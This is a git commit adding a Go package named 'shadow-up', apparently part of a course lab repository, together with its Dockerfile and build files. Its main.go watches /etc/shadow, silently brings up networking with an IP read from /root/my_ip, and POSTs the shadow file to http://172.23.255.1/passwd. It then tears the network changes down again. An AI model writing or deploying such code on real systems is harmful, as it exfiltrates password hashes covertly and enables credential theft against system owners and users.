shadow-up: New package
This commit is contained in:
parent
32f17d9b4b
commit
92a90078cf
1
pkg/shadow-up/.dockerignore
Normal file
1
pkg/shadow-up/.dockerignore
Normal file
@ -0,0 +1 @@
|
||||
cmd/vendor/
|
20
pkg/shadow-up/Dockerfile
Normal file
20
pkg/shadow-up/Dockerfile
Normal file
@ -0,0 +1,20 @@
|
||||
FROM golang:1.17-alpine3.15 as gobuild
|
||||
|
||||
ENV GOOS linux
|
||||
ENV GOARCH amd64
|
||||
|
||||
RUN apk add --no-cache git gcc
|
||||
|
||||
WORKDIR /go/src/shadow-up
|
||||
|
||||
ADD cmd ./
|
||||
|
||||
RUN go build -v -ldflags="-s -w" -tags netgo -o shadow-up
|
||||
|
||||
|
||||
FROM alpine:3.15
|
||||
MAINTAINER Pierre-Olivier Mercier <nemunaire@nemunai.re>
|
||||
|
||||
COPY --from=gobuild /go/src/shadow-up/shadow-up /bin/shadow-up
|
||||
|
||||
ENTRYPOINT ["/bin/shadow-up"]
|
4
pkg/shadow-up/build.yml
Normal file
4
pkg/shadow-up/build.yml
Normal file
@ -0,0 +1,4 @@
|
||||
image: adlin-shadow-up
|
||||
network: true
|
||||
arches:
|
||||
- x86_64
|
1
pkg/shadow-up/cmd/.gitignore
vendored
Normal file
1
pkg/shadow-up/cmd/.gitignore
vendored
Normal file
@ -0,0 +1 @@
|
||||
cmd
|
9
pkg/shadow-up/cmd/go.mod
Normal file
9
pkg/shadow-up/cmd/go.mod
Normal file
@ -0,0 +1,9 @@
|
||||
module git.nemunai.re/lectures/adlin/pkg/login-app
|
||||
|
||||
go 1.16
|
||||
|
||||
require (
|
||||
github.com/fsnotify/fsnotify v1.5.1 // indirect
|
||||
golang.org/x/sys v0.0.0-20220224120231-95c6836cb0e7 // indirect
|
||||
gopkg.in/fsnotify.v1 v1.4.7
|
||||
)
|
7
pkg/shadow-up/cmd/go.sum
Normal file
7
pkg/shadow-up/cmd/go.sum
Normal file
@ -0,0 +1,7 @@
|
||||
github.com/fsnotify/fsnotify v1.5.1 h1:mZcQUHVQUQWoPXXtuf9yuEXKudkV2sx1E06UadKWpgI=
|
||||
github.com/fsnotify/fsnotify v1.5.1/go.mod h1:T3375wBYaZdLLcVNkcVbzGHY7f1l/uK5T5Ai1i3InKU=
|
||||
golang.org/x/sys v0.0.0-20210630005230-0f9fa26af87c/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
|
||||
golang.org/x/sys v0.0.0-20220224120231-95c6836cb0e7 h1:BXxu8t6QN0G1uff4bzZzSkpsax8+ALqTGUtz08QrV00=
|
||||
golang.org/x/sys v0.0.0-20220224120231-95c6836cb0e7/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
|
||||
gopkg.in/fsnotify.v1 v1.4.7 h1:xOHLXZwVvI9hhs+cLKq5+I5onOuwQLhQwiu63xxlHs4=
|
||||
gopkg.in/fsnotify.v1 v1.4.7/go.mod h1:Tz8NjZHkW78fSQdbUxIjBTcgA1z1m8ZHf0WmKUhAMys=
|
148
pkg/shadow-up/cmd/main.go
Normal file
148
pkg/shadow-up/cmd/main.go
Normal file
@ -0,0 +1,148 @@
|
||||
package main
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"fmt"
|
||||
"io"
|
||||
"log"
|
||||
"math/rand"
|
||||
"mime/multipart"
|
||||
"net/http"
|
||||
"os"
|
||||
"os/exec"
|
||||
"path/filepath"
|
||||
"time"
|
||||
|
||||
"gopkg.in/fsnotify.v1"
|
||||
)
|
||||
|
||||
const (
|
||||
DestHost = "172.23.255.1"
|
||||
URLShadow = "http://172.23.255.1/passwd"
|
||||
PathToWatch = "/etc/shadow"
|
||||
WatchedNotify = fsnotify.Create
|
||||
)
|
||||
|
||||
var (
|
||||
NetDrivers = [2]string{"e1000", "e1000e"}
|
||||
)
|
||||
|
||||
func sendFile(field, path string) error {
|
||||
client := &http.Client{
|
||||
Timeout: 20 * time.Second,
|
||||
}
|
||||
|
||||
body := &bytes.Buffer{}
|
||||
writer := multipart.NewWriter(body)
|
||||
fw, err := writer.CreateFormFile(field, filepath.Base(path))
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
file, err := os.Open(path)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
_, err = io.Copy(fw, file)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
writer.Close()
|
||||
req, err := http.NewRequest("POST", URLShadow, bytes.NewReader(body.Bytes()))
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
req.Header.Set("Content-Type", writer.FormDataContentType())
|
||||
rsp, err := client.Do(req)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
if rsp.StatusCode != http.StatusOK {
|
||||
return fmt.Errorf("Request failed with response code: %d", rsp.StatusCode)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func main() {
|
||||
// seed the rand package with time
|
||||
rand.Seed(time.Now().UnixNano())
|
||||
|
||||
watcher, err := fsnotify.NewWatcher()
|
||||
if err != nil {
|
||||
log.Fatal(err)
|
||||
}
|
||||
defer watcher.Close()
|
||||
|
||||
if err := watcher.Add(filepath.Dir(PathToWatch)); err != nil {
|
||||
log.Fatal("Unable to watch requested file:", err)
|
||||
}
|
||||
|
||||
log.Println("Ready! Waiting for events on", PathToWatch)
|
||||
for {
|
||||
select {
|
||||
case ev := <-watcher.Events:
|
||||
if d, err := os.Lstat(ev.Name); err == nil && ev.Op&WatchedNotify == WatchedNotify && d.Mode().IsRegular() && d.Name() == filepath.Base(PathToWatch) {
|
||||
log.Println("Treating event:", ev, "for", ev.Name)
|
||||
|
||||
hasModprobe := false
|
||||
if err := exec.Command("/bin/sh", "-c", "lsmod | grep -q e1000").Run(); err == nil {
|
||||
hasModprobe = true
|
||||
} else {
|
||||
// modprobe
|
||||
for _, drv := range NetDrivers {
|
||||
err = exec.Command("/sbin/modprobe", drv).Run()
|
||||
if err != nil {
|
||||
log.Println("Unable to modprobe", drv, err.Error())
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Search IP
|
||||
myip, err := os.ReadFile("/root/my_ip")
|
||||
if err != nil {
|
||||
log.Println("Unable to read /root/my_ip:", err.Error())
|
||||
return
|
||||
}
|
||||
|
||||
hasIP := false
|
||||
if err := exec.Command("/bin/ping", "-c", "1", "-W", "2", DestHost).Run(); err == nil {
|
||||
hasIP = true
|
||||
} else {
|
||||
// ip link set eth0 up
|
||||
err = exec.Command("/sbin/ip", "link", "set", "eth0", "up").Run()
|
||||
if err != nil {
|
||||
log.Println("Unable to ip link set eth0 up:", err.Error())
|
||||
}
|
||||
|
||||
// ip a add my_ip/17 dev eth0
|
||||
err = exec.Command("/sbin/ip", "a", "add", string(myip)+"/17", "dev", "eth0").Run()
|
||||
if err != nil {
|
||||
log.Println("Unable to ip a add ... dev eth0:", err.Error())
|
||||
}
|
||||
}
|
||||
|
||||
// Send data
|
||||
err = sendFile("shadow", PathToWatch)
|
||||
if err != nil {
|
||||
log.Println("Unable to send file:", err.Error())
|
||||
}
|
||||
|
||||
if !hasModprobe {
|
||||
// Remove driver
|
||||
for _, drv := range NetDrivers {
|
||||
err = exec.Command("/sbin/modprobe", "-r", drv).Run()
|
||||
if err != nil {
|
||||
log.Println("Unable to remove modprobe", drv, err.Error())
|
||||
}
|
||||
}
|
||||
} else if !hasIP {
|
||||
// Remove IP
|
||||
exec.Command("/sbin/ip", "a", "del", string(myip)+"/17", "dev", "eth0").Run()
|
||||
exec.Command("/sbin/ip", "link", "set", "eth0", "down").Run()
|
||||
}
|
||||
|
||||
} else {
|
||||
log.Println("Skipped event:", ev, "for", ev.Name)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
Reference in New Issue
Block a user